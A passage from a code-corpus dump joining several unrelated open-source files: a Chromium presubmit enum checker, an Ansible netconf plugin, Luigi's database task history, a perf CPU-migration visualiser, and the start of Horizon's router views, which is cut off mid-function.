for what are considered valid changes. There are situations where this script
gives false positive warnings, i.e. it warns even though the edit is
legitimate. Since the script warns using prompt warnings, the user can always
choose to continue. The main point is to attract the attention to all
(potentially or not) invalid edits.
"""
# The name of the file we want to check against
LOCAL_PATH = "chrome/browser/extensions/extension_function_histogram_value.h"
# The markers we look for in the above source file as delimiters of the enum
# definition.
ENUM_START_MARKER = "enum HistogramValue {"
ENUM_END_MARKER = " ENUM_BOUNDARY"
def __init__(self, input_api, output_api):
self.input_api = input_api
self.output_api = output_api
self.results = []
class EnumRange(object):
"""Represents a range of line numbers (1-based)"""
def __init__(self, first_line, last_line):
self.first_line = first_line
self.last_line = last_line
def Count(self):
return self.last_line - self.first_line + 1
def Contains(self, line_num):
return self.first_line <= line_num and line_num <= self.last_line
def LogInfo(self, message):
self.input_api.logging.info(message)
return
def LogDebug(self, message):
self.input_api.logging.debug(message)
return
def ComputeEnumRangeInContents(self, contents):
"""Returns an |EnumRange| object representing the line extent of the
HistogramValue enum members in |contents|. The line numbers are 1-based,
compatible with line numbers returned by AffectedFile.ChangeContents().
|contents| is a list of strings reprenting the lines of a text file.
If either ENUM_START_MARKER or ENUM_END_MARKER cannot be found in
|contents|, returns None and emits detailed warnings about the problem.
"""
first_enum_line = 0
last_enum_line = 0
line_num = 1 # Line numbers are 1-based
for line in contents:
if line.startswith(self.ENUM_START_MARKER):
first_enum_line = line_num + 1
elif line.startswith(self.ENUM_END_MARKER):
last_enum_line = line_num
line_num += 1
if first_enum_line == 0:
self.EmitWarning("The presubmit script could not find the start of the "
"enum definition (\"%s\"). Did the enum definition "
"change?" % self.ENUM_START_MARKER)
return None
if last_enum_line == 0:
self.EmitWarning("The presubmit script could not find the end of the "
"enum definition (\"%s\"). Did the enum definition "
"change?" % self.ENUM_END_MARKER)
return None
if first_enum_line >= last_enum_line:
self.EmitWarning("The presubmit script located the start of the enum "
"definition (\"%s\" at line %d) *after* its end "
"(\"%s\" at line %d). Something is not quite right."
% (self.ENUM_START_MARKER, first_enum_line,
self.ENUM_END_MARKER, last_enum_line))
return None
self.LogInfo("Line extent of |HistogramValue| enum definition: "
"first_line=%d, last_line=%d."
% (first_enum_line, last_enum_line))
return self.EnumRange(first_enum_line, last_enum_line)
def ComputeEnumRangeInNewFile(self, affected_file):
return self.ComputeEnumRangeInContents(affected_file.NewContents())
def GetLongMessage(self):
return str("The file \"%s\" contains the definition of the "
"|HistogramValue| enum which should be edited in specific ways "
"only - *** read the comments at the top of the header file ***"
". There are changes to the file that may be incorrect and "
"warrant manual confirmation after review. Note that this "
"presubmit script can not reliably report the nature of all "
"types of invalid changes, especially when the diffs are "
"complex. For example, an invalid deletion may be reported "
"whereas the change contains a valid rename."
% self.LOCAL_PATH)
def EmitWarning(self, message, line_number=None, line_text=None):
"""Emits a presubmit prompt warning containing the short message
|message|. |item| is |LOCAL_PATH| with optional |line_number| and
|line_text|.
"""
if line_number is not None and line_text is not None:
item = "%s(%d): %s" % (self.LOCAL_PATH, line_number, line_text)
elif line_number is not None:
item = "%s(%d)" % (self.LOCAL_PATH, line_number)
else:
item = self.LOCAL_PATH
long_message = self.GetLongMessage()
self.LogInfo(message)
self.results.append(
self.output_api.PresubmitPromptWarning(message, [item], long_message))
def CollectRangesInsideEnumDefinition(self, affected_file,
first_line, last_line):
"""Returns a list of triplet (line_start, line_end, line_text) of ranges of
edits changes. The |line_text| part is the text at line |line_start|.
Since it used only for reporting purposes, we do not need all the text
lines in the range.
"""
results = []
previous_line_number = 0
previous_range_start_line_number = 0
previous_range_start_text = ""
def addRange():
tuple = (previous_range_start_line_number,
previous_line_number,
previous_range_start_text)
results.append(tuple)
for line_number, line_text in affected_file.ChangedContents():
if first_line <= line_number and line_number <= last_line:
self.LogDebug("Line change at line number " + str(line_number) + ": " +
line_text)
# Start a new interval if none started
if previous_range_start_line_number == 0:
previous_range_start_line_number = line_number
previous_range_start_text = line_text
# Add new interval if we reached past the previous one
elif line_number != previous_line_number + 1:
addRange()
previous_range_start_line_number = line_number
previous_range_start_text = line_text
previous_line_number = line_number
# Add a last interval if needed
if previous_range_start_line_number != 0:
addRange()
return results
def CheckForFileDeletion(self, affected_file):
"""Emits a warning notification if file has been deleted """
if not affected_file.NewContents():
self.EmitWarning("The file seems to be deleted in the changelist. If "
"your intent is to really delete the file, the code in "
"PRESUBMIT.py should be updated to remove the "
"|HistogramValueChecker| class.");
return False
return True
def GetDeletedLinesFromScmDiff(self, affected_file):
"""Return a list of of line numbers (1-based) corresponding to lines
deleted from the new source file (if they had been present in it). Note
that if multiple contiguous lines have been deleted, the returned list will
contain contiguous line number entries. To prevent false positives, we
return deleted line numbers *only* from diff chunks which decrease the size
of the new file.
Note: We need this method because we have access to neither the old file
content nor the list of "delete" changes from the current presubmit script
API.
"""
results = []
line_num = 0
deleting_lines = False
for line in affected_file.GenerateScmDiff().splitlines():
# Parse the unified diff chunk optional section heading, which looks like
# @@ -l,s +l,s @@ optional section heading
m = self.input_api.re.match(
r'^@@ \-([0-9]+)\,([0-9]+) \+([0-9]+)\,([0-9]+) @@', line)
if m:
old_line_num = int(m.group(1))
old_size = int(m.group(2))
new_line_num = int(m.group(3))
new_size = int(m.group(4))
line_num = new_line_num
# Return line numbers only from diff chunks decreasing the size of the
# new file
deleting_lines = old_size > new_size
continue
if not line.startswith('-'):
line_num += 1
if deleting_lines and line.startswith('-') and not line.startswith('--'):
results.append(line_num)
return results
def CheckForEnumEntryDeletions(self, affected_file):
"""Look for deletions inside the enum definition. We currently use a
simple heuristics (not 100% accurate): if there are deleted lines inside
the enum definition, this might be a deletion.
"""
range_new = self.ComputeEnumRangeInNewFile(affected_file)
if not range_new:
return False
is_ok = True
for line_num in self.GetDeletedLinesFromScmDiff(affected_file):
if range_new.Contains(line_num):
self.EmitWarning("It looks like you are deleting line(s) from the "
"enum definition. This should never happen.",
line_num)
is_ok = False
return is_ok
def CheckForEnumEntryInsertions(self, affected_file):
range = self.ComputeEnumRangeInNewFile(affected_file)
if not range:
return False
first_line = range.first_line
last_line = range.last_line
# Collect the range of changes inside the enum definition range.
is_ok = True
for line_start, line_end, line_text in \
self.CollectRangesInsideEnumDefinition(affected_file,
first_line,
last_line):
# The only edit we consider valid is adding 1 or more entries *exactly*
# at the end of the enum definition. Every other edit inside the enum
# definition will result in a "warning confirmation" message.
#
# TODO(rpaquay): We currently cannot detect "renames" of existing entries
# vs invalid insertions, so we sometimes will warn for valid edits.
is_valid_edit = (line_end == last_line - 1)
self.LogDebug("Edit range in new file at starting at line number %d and "
"ending at line number %d: valid=%s"
% (line_start, line_end, is_valid_edit))
if not is_valid_edit:
self.EmitWarning("The change starting at line %d and ending at line "
"%d is *not* located *exactly* at the end of the "
"enum definition. Unless you are renaming an "
"existing entry, this is not a valid changes, as new "
"entries should *always* be added at the end of the "
"enum definition, right before the 'ENUM_BOUNDARY' "
"entry." % (line_start, line_end),
line_start,
line_text)
is_ok = False
return is_ok
def PerformChecks(self, affected_file):
if not self.CheckForFileDeletion(affected_file):
return
if not self.CheckForEnumEntryDeletions(affected_file):
return
if not self.CheckForEnumEntryInsertions(affected_file):
return
def ProcessHistogramValueFile(self, affected_file):
self.LogInfo("Start processing file \"%s\"" % affected_file.LocalPath())
self.PerformChecks(affected_file)
self.LogInfo("Done processing file \"%s\"" % affected_file.LocalPath())
def Run(self):
for file in self.input_api.AffectedFiles(include_deletes=True):
if file.LocalPath() == self.LOCAL_PATH:
self.ProcessHistogramValueFile(file)
return self.results
def CheckChangeOnUpload(input_api, output_api):
results = []
results += HistogramValueChecker(input_api, output_api).Run()
return results
|
bsd-3-clause
|
xen0l/ansible
|
lib/ansible/plugins/netconf/default.py
|
79
|
2030
|
#
# (c) 2017 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from ansible.module_utils._text import to_text, to_bytes
from ansible.plugins.netconf import NetconfBase
class Netconf(NetconfBase):
def get_text(self, ele, tag):
try:
return to_text(ele.find(tag).text, errors='surrogate_then_replace').strip()
except AttributeError:
pass
def get_device_info(self):
device_info = dict()
device_info['network_os'] = 'default'
return device_info
def get_capabilities(self):
result = dict()
result['rpc'] = self.get_base_rpc() + ['commit', 'discard_changes', 'validate', 'lock', 'unlock', 'copy_copy',
'execute_rpc', 'load_configuration', 'get_configuration', 'command',
'reboot', 'halt']
result['network_api'] = 'netconf'
result['device_info'] = self.get_device_info()
result['server_capabilities'] = [c for c in self.m.server_capabilities]
result['client_capabilities'] = [c for c in self.m.client_capabilities]
result['session_id'] = self.m.session_id
result['device_operations'] = self.get_device_operations(result['server_capabilities'])
return json.dumps(result)
|
gpl-3.0
|
dhruvg/luigi
|
luigi/db_task_history.py
|
50
|
8720
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Provides a database backend to the central scheduler. This lets you see historical runs.
See :ref:`TaskHistory` for information about how to turn out the task history feature.
"""
#
# Description: Added codes for visualization of how long each task takes
# running-time until it reaches the next status (failed or done)
# At "{base_url}/tasklist", all completed(failed or done) tasks are shown.
# At "{base_url}/tasklist", a user can select one specific task to see
# how its running-time has changed over time.
# At "{base_url}/tasklist/{task_name}", it visualizes a multi-bar graph
# that represents the changes of the running-time for a selected task
# up to the next status (failed or done).
# This visualization let us know how the running-time of the specific task
# has changed over time.
#
# Copyright 2015 Naver Corp.
# Author Yeseul Park ([email protected])
#
import datetime
import logging
from contextlib import contextmanager
from luigi import six
from luigi import configuration
from luigi import task_history
from luigi.task_status import DONE, FAILED, PENDING, RUNNING
import sqlalchemy
import sqlalchemy.ext.declarative
import sqlalchemy.orm
import sqlalchemy.orm.collections
Base = sqlalchemy.ext.declarative.declarative_base()
logger = logging.getLogger('luigi-interface')
class DbTaskHistory(task_history.TaskHistory):
"""
Task History that writes to a database using sqlalchemy.
Also has methods for useful db queries.
"""
@contextmanager
def _session(self, session=None):
if session:
yield session
else:
session = self.session_factory()
try:
yield session
except:
session.rollback()
raise
else:
session.commit()
def __init__(self):
config = configuration.get_config()
connection_string = config.get('task_history', 'db_connection')
self.engine = sqlalchemy.create_engine(connection_string)
self.session_factory = sqlalchemy.orm.sessionmaker(bind=self.engine, expire_on_commit=False)
Base.metadata.create_all(self.engine)
self.tasks = {} # task_id -> TaskRecord
def task_scheduled(self, task_id):
task = self._get_task(task_id, status=PENDING)
self._add_task_event(task, TaskEvent(event_name=PENDING, ts=datetime.datetime.now()))
def task_finished(self, task_id, successful):
event_name = DONE if successful else FAILED
task = self._get_task(task_id, status=event_name)
self._add_task_event(task, TaskEvent(event_name=event_name, ts=datetime.datetime.now()))
def task_started(self, task_id, worker_host):
task = self._get_task(task_id, status=RUNNING, host=worker_host)
self._add_task_event(task, TaskEvent(event_name=RUNNING, ts=datetime.datetime.now()))
def _get_task(self, task_id, status, host=None):
if task_id in self.tasks:
task = self.tasks[task_id]
task.status = status
if host:
task.host = host
else:
task = self.tasks[task_id] = task_history.Task(task_id, status, host)
return task
def _add_task_event(self, task, event):
for (task_record, session) in self._find_or_create_task(task):
task_record.events.append(event)
def _find_or_create_task(self, task):
with self._session() as session:
if task.record_id is not None:
logger.debug("Finding task with record_id [%d]", task.record_id)
task_record = session.query(TaskRecord).get(task.record_id)
if not task_record:
raise Exception("Task with record_id, but no matching Task record!")
yield (task_record, session)
else:
task_record = TaskRecord(name=task.task_family, host=task.host)
for (k, v) in six.iteritems(task.parameters):
task_record.parameters[k] = TaskParameter(name=k, value=v)
session.add(task_record)
yield (task_record, session)
if task.host:
task_record.host = task.host
task.record_id = task_record.id
def find_all_by_parameters(self, task_name, session=None, **task_params):
"""
Find tasks with the given task_name and the same parameters as the kwargs.
"""
with self._session(session) as session:
tasks = session.query(TaskRecord).join(TaskEvent).filter(TaskRecord.name == task_name).order_by(TaskEvent.ts).all()
for task in tasks:
if all(k in task.parameters and v == str(task.parameters[k].value) for (k, v) in six.iteritems(task_params)):
yield task
def find_all_by_name(self, task_name, session=None):
"""
Find all tasks with the given task_name.
"""
return self.find_all_by_parameters(task_name, session)
def find_latest_runs(self, session=None):
"""
Return tasks that have been updated in the past 24 hours.
"""
with self._session(session) as session:
yesterday = datetime.datetime.now() - datetime.timedelta(days=1)
return session.query(TaskRecord).\
join(TaskEvent).\
filter(TaskEvent.ts >= yesterday).\
group_by(TaskRecord.id, TaskEvent.event_name, TaskEvent.ts).\
order_by(TaskEvent.ts.desc()).\
all()
def find_all_runs(self, session=None):
"""
Return all tasks that have been updated.
"""
with self._session(session) as session:
return session.query(TaskRecord).all()
def find_all_events(self, session=None):
"""
Return all running/failed/done events.
"""
with self._session(session) as session:
return session.query(TaskEvent).all()
def find_task_by_id(self, id, session=None):
"""
Find task with the given record ID.
"""
with self._session(session) as session:
return session.query(TaskRecord).get(id)
class TaskParameter(Base):
"""
Table to track luigi.Parameter()s of a Task.
"""
__tablename__ = 'task_parameters'
task_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('tasks.id'), primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String(128), primary_key=True)
value = sqlalchemy.Column(sqlalchemy.String(256))
def __repr__(self):
return "TaskParameter(task_id=%d, name=%s, value=%s)" % (self.task_id, self.name, self.value)
class TaskEvent(Base):
"""
Table to track when a task is scheduled, starts, finishes, and fails.
"""
__tablename__ = 'task_events'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
task_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('tasks.id'))
event_name = sqlalchemy.Column(sqlalchemy.String(20))
ts = sqlalchemy.Column(sqlalchemy.TIMESTAMP, index=True, nullable=False)
def __repr__(self):
return "TaskEvent(task_id=%s, event_name=%s, ts=%s" % (self.task_id, self.event_name, self.ts)
class TaskRecord(Base):
"""
Base table to track information about a luigi.Task.
References to other tables are available through task.events, task.parameters, etc.
"""
__tablename__ = 'tasks'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String(128), index=True)
host = sqlalchemy.Column(sqlalchemy.String(128))
parameters = sqlalchemy.orm.relationship(
'TaskParameter',
collection_class=sqlalchemy.orm.collections.attribute_mapped_collection('name'),
cascade="all, delete-orphan")
events = sqlalchemy.orm.relationship(
'TaskEvent',
order_by=(sqlalchemy.desc(TaskEvent.ts), sqlalchemy.desc(TaskEvent.id)),
backref='task')
def __repr__(self):
return "TaskRecord(name=%s, host=%s)" % (self.name, self.host)
|
apache-2.0
|
wjb/mx-common
|
tools/perf/scripts/python/sched-migration.py
|
11215
|
11670
|
#!/usr/bin/python
#
# Cpu task migration overview toy
#
# Copyright (C) 2010 Frederic Weisbecker <[email protected]>
#
# perf script event handlers have been generated by perf script -g python
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import os
import sys
from collections import defaultdict
from UserList import UserList
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
sys.path.append('scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from SchedGui import *
threads = { 0 : "idle"}
def thread_name(pid):
return "%s:%d" % (threads[pid], pid)
class RunqueueEventUnknown:
@staticmethod
def color():
return None
def __repr__(self):
return "unknown"
class RunqueueEventSleep:
@staticmethod
def color():
return (0, 0, 0xff)
def __init__(self, sleeper):
self.sleeper = sleeper
def __repr__(self):
return "%s gone to sleep" % thread_name(self.sleeper)
class RunqueueEventWakeup:
@staticmethod
def color():
return (0xff, 0xff, 0)
def __init__(self, wakee):
self.wakee = wakee
def __repr__(self):
return "%s woke up" % thread_name(self.wakee)
class RunqueueEventFork:
@staticmethod
def color():
return (0, 0xff, 0)
def __init__(self, child):
self.child = child
def __repr__(self):
return "new forked task %s" % thread_name(self.child)
class RunqueueMigrateIn:
@staticmethod
def color():
return (0, 0xf0, 0xff)
def __init__(self, new):
self.new = new
def __repr__(self):
return "task migrated in %s" % thread_name(self.new)
class RunqueueMigrateOut:
@staticmethod
def color():
return (0xff, 0, 0xff)
def __init__(self, old):
self.old = old
def __repr__(self):
return "task migrated out %s" % thread_name(self.old)
class RunqueueSnapshot:
def __init__(self, tasks = [0], event = RunqueueEventUnknown()):
self.tasks = tuple(tasks)
self.event = event
def sched_switch(self, prev, prev_state, next):
event = RunqueueEventUnknown()
if taskState(prev_state) == "R" and next in self.tasks \
and prev in self.tasks:
return self
if taskState(prev_state) != "R":
event = RunqueueEventSleep(prev)
next_tasks = list(self.tasks[:])
if prev in self.tasks:
if taskState(prev_state) != "R":
next_tasks.remove(prev)
elif taskState(prev_state) == "R":
next_tasks.append(prev)
if next not in next_tasks:
next_tasks.append(next)
return RunqueueSnapshot(next_tasks, event)
def migrate_out(self, old):
if old not in self.tasks:
return self
next_tasks = [task for task in self.tasks if task != old]
return RunqueueSnapshot(next_tasks, RunqueueMigrateOut(old))
def __migrate_in(self, new, event):
if new in self.tasks:
self.event = event
return self
next_tasks = self.tasks[:] + tuple([new])
return RunqueueSnapshot(next_tasks, event)
def migrate_in(self, new):
return self.__migrate_in(new, RunqueueMigrateIn(new))
def wake_up(self, new):
return self.__migrate_in(new, RunqueueEventWakeup(new))
def wake_up_new(self, new):
return self.__migrate_in(new, RunqueueEventFork(new))
def load(self):
""" Provide the number of tasks on the runqueue.
Don't count idle"""
return len(self.tasks) - 1
def __repr__(self):
ret = self.tasks.__repr__()
ret += self.origin_tostring()
return ret
class TimeSlice:
def __init__(self, start, prev):
self.start = start
self.prev = prev
self.end = start
# cpus that triggered the event
self.event_cpus = []
if prev is not None:
self.total_load = prev.total_load
self.rqs = prev.rqs.copy()
else:
self.rqs = defaultdict(RunqueueSnapshot)
self.total_load = 0
def __update_total_load(self, old_rq, new_rq):
diff = new_rq.load() - old_rq.load()
self.total_load += diff
def sched_switch(self, ts_list, prev, prev_state, next, cpu):
old_rq = self.prev.rqs[cpu]
new_rq = old_rq.sched_switch(prev, prev_state, next)
if old_rq is new_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def migrate(self, ts_list, new, old_cpu, new_cpu):
if old_cpu == new_cpu:
return
old_rq = self.prev.rqs[old_cpu]
out_rq = old_rq.migrate_out(new)
self.rqs[old_cpu] = out_rq
self.__update_total_load(old_rq, out_rq)
new_rq = self.prev.rqs[new_cpu]
in_rq = new_rq.migrate_in(new)
self.rqs[new_cpu] = in_rq
self.__update_total_load(new_rq, in_rq)
ts_list.append(self)
if old_rq is not out_rq:
self.event_cpus.append(old_cpu)
self.event_cpus.append(new_cpu)
def wake_up(self, ts_list, pid, cpu, fork):
old_rq = self.prev.rqs[cpu]
if fork:
new_rq = old_rq.wake_up_new(pid)
else:
new_rq = old_rq.wake_up(pid)
if new_rq is old_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def next(self, t):
self.end = t
return TimeSlice(t, self)
class TimeSliceList(UserList):
def __init__(self, arg = []):
self.data = arg
def get_time_slice(self, ts):
if len(self.data) == 0:
slice = TimeSlice(ts, TimeSlice(-1, None))
else:
slice = self.data[-1].next(ts)
return slice
def find_time_slice(self, ts):
start = 0
end = len(self.data)
found = -1
searching = True
while searching:
if start == end or start == end - 1:
searching = False
i = (end + start) / 2
if self.data[i].start <= ts and self.data[i].end >= ts:
found = i
end = i
continue
if self.data[i].end < ts:
start = i
elif self.data[i].start > ts:
end = i
return found
def set_root_win(self, win):
self.root_win = win
def mouse_down(self, cpu, t):
idx = self.find_time_slice(t)
if idx == -1:
return
ts = self[idx]
rq = ts.rqs[cpu]
raw = "CPU: %d\n" % cpu
raw += "Last event : %s\n" % rq.event.__repr__()
raw += "Timestamp : %d.%06d\n" % (ts.start / (10 ** 9), (ts.start % (10 ** 9)) / 1000)
raw += "Duration : %6d us\n" % ((ts.end - ts.start) / (10 ** 6))
raw += "Load = %d\n" % rq.load()
for t in rq.tasks:
raw += "%s \n" % thread_name(t)
self.root_win.update_summary(raw)
def update_rectangle_cpu(self, slice, cpu):
rq = slice.rqs[cpu]
if slice.total_load != 0:
load_rate = rq.load() / float(slice.total_load)
else:
load_rate = 0
red_power = int(0xff - (0xff * load_rate))
color = (0xff, red_power, red_power)
top_color = None
if cpu in slice.event_cpus:
top_color = rq.event.color()
self.root_win.paint_rectangle_zone(cpu, color, top_color, slice.start, slice.end)
def fill_zone(self, start, end):
i = self.find_time_slice(start)
if i == -1:
return
for i in xrange(i, len(self.data)):
timeslice = self.data[i]
if timeslice.start > end:
return
for cpu in timeslice.rqs:
self.update_rectangle_cpu(timeslice, cpu)
def interval(self):
if len(self.data) == 0:
return (0, 0)
return (self.data[0].start, self.data[-1].end)
def nr_rectangles(self):
last_ts = self.data[-1]
max_cpu = 0
for cpu in last_ts.rqs:
if cpu > max_cpu:
max_cpu = cpu
return max_cpu
class SchedEventProxy:
def __init__(self):
self.current_tsk = defaultdict(lambda : -1)
self.timeslices = TimeSliceList()
def sched_switch(self, headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
""" Ensure the task we sched out this cpu is really the one
we logged. Otherwise we may have missed traces """
on_cpu_task = self.current_tsk[headers.cpu]
if on_cpu_task != -1 and on_cpu_task != prev_pid:
print "Sched switch event rejected ts: %s cpu: %d prev: %s(%d) next: %s(%d)" % \
(headers.ts_format(), headers.cpu, prev_comm, prev_pid, next_comm, next_pid)
threads[prev_pid] = prev_comm
threads[next_pid] = next_comm
self.current_tsk[headers.cpu] = next_pid
ts = self.timeslices.get_time_slice(headers.ts())
ts.sched_switch(self.timeslices, prev_pid, prev_state, next_pid, headers.cpu)
def migrate(self, headers, pid, prio, orig_cpu, dest_cpu):
ts = self.timeslices.get_time_slice(headers.ts())
ts.migrate(self.timeslices, pid, orig_cpu, dest_cpu)
def wake_up(self, headers, comm, pid, success, target_cpu, fork):
if success == 0:
return
ts = self.timeslices.get_time_slice(headers.ts())
ts.wake_up(self.timeslices, pid, target_cpu, fork)
def trace_begin():
global parser
parser = SchedEventProxy()
def trace_end():
app = wx.App(False)
timeslices = parser.timeslices
frame = RootFrame(timeslices, "Migration")
app.MainLoop()
def sched__sched_stat_runtime(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, runtime, vruntime):
pass
def sched__sched_stat_iowait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_sleep(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_process_fork(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
parent_comm, parent_pid, child_comm, child_pid):
pass
def sched__sched_process_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_free(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_migrate_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, orig_cpu,
dest_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.migrate(headers, pid, prio, orig_cpu, dest_cpu)
def sched__sched_switch(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.sched_switch(headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio)
def sched__sched_wakeup_new(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 1)
def sched__sched_wakeup(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 0)
def sched__sched_wait_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_kthread_stop_ret(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
ret):
pass
def sched__sched_kthread_stop(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid):
pass
def trace_unhandled(event_name, context, common_cpu, common_secs, common_nsecs,
common_pid, common_comm):
pass
|
gpl-2.0
|
TechBK/horizon-dev
|
openstack_dashboard/dashboards/project/routers/views.py
|
36
|
8431
|
# Copyright 2012, Nachi Ueno, NTT MCL, Inc.
# Copyright 2013, Big Switch Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Views for managing Neutron Routers.
"""
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.datastructures import SortedDict
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from horizon import tables
from horizon import tabs
from horizon.utils import memoized
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.routers\
import forms as project_forms
from openstack_dashboard.dashboards.project.routers import tables as rtables
from openstack_dashboard.dashboards.project.routers import tabs as rdtabs
class IndexView(tables.DataTableView):
table_class = rtables.RoutersTable
template_name = 'project/routers/index.html'
page_title = _("Routers")
def _get_routers(self, search_opts=None):
try:
tenant_id = self.request.user.tenant_id
routers = api.neutron.router_list(self.request,
tenant_id=tenant_id,
search_opts=search_opts)
except Exception:
routers = []
exceptions.handle(self.request,
_('Unable to retrieve router list.'))
ext_net_dict = self._list_external_networks()
for r in routers:
r.name = r.name_or_id
self._set_external_network(r, ext_net_dict)
return routers
def get_data(self):
routers = self._get_routers()
return routers
def _list_external_networks(self):
try:
search_opts = {'router:external': True}
ext_nets = api.neutron.network_list(self.request,
**search_opts)
ext_net_dict = SortedDict((n['id'], n.name_or_id)
for n in ext_nets)
except Exception as e:
msg = _('Unable to retrieve a list of external networks "%s".') % e
exceptions.handle(self.request, msg)
ext_net_dict = {}
return ext_net_dict
def _set_external_network(self, router, ext_net_dict):
gateway_info = router.external_gateway_info
if gateway_info:
ext_net_id = gateway_info['network_id']
if ext_net_id in ext_net_dict:
gateway_info['network'] = ext_net_dict[ext_net_id]
else:
msg_params = {'ext_net_id': ext_net_id, 'router_id': router.id}
msg = _('External network "%(ext_net_id)s" expected but not '
'found for router "%(router_id)s".') % msg_params
messages.error(self.request, msg)
# gateway_info['network'] is just the network name, so putting
# in a smallish error message in the table is reasonable.
gateway_info['network'] = pgettext_lazy(
'External network not found',
# Translators: The usage is "<UUID of ext_net> (Not Found)"
u'%s (Not Found)') % ext_net_id
class DetailView(tabs.TabbedTableView):
tab_group_class = rdtabs.RouterDetailTabs
template_name = 'project/routers/detail.html'
failure_url = reverse_lazy('horizon:project:routers:index')
page_title = _("Router Details")
@memoized.memoized_method
def _get_data(self):
try:
router_id = self.kwargs['router_id']
router = api.neutron.router_get(self.request, router_id)
router.set_id_as_name_if_empty(length=0)
except Exception:
msg = _('Unable to retrieve details for router "%s".') \
% router_id
exceptions.handle(self.request, msg, redirect=self.failure_url)
if router.external_gateway_info:
ext_net_id = router.external_gateway_info['network_id']
try:
ext_net = api.neutron.network_get(self.request, ext_net_id,
expand_subnet=False)
ext_net.set_id_as_name_if_empty(length=0)
router.external_gateway_info['network'] = ext_net.name
except Exception:
msg = _('Unable to retrieve an external network "%s".') \
% ext_net_id
exceptions.handle(self.request, msg)
router.external_gateway_info['network'] = ext_net_id
return router
@memoized.memoized_method
def _get_ports(self):
try:
ports = api.neutron.port_list(self.request,
device_id=self.kwargs['router_id'])
except Exception:
ports = []
msg = _('Unable to retrieve port details.')
exceptions.handle(self.request, msg)
return ports
def get_context_data(self, **kwargs):
context = super(DetailView, self).get_context_data(**kwargs)
router = self._get_data()
table = rtables.RoutersTable(self.request)
context["router"] = router
context["url"] = self.failure_url
context["actions"] = table.render_row_actions(router)
context['dvr_supported'] = api.neutron.get_feature_permission(
self.request, "dvr", "get")
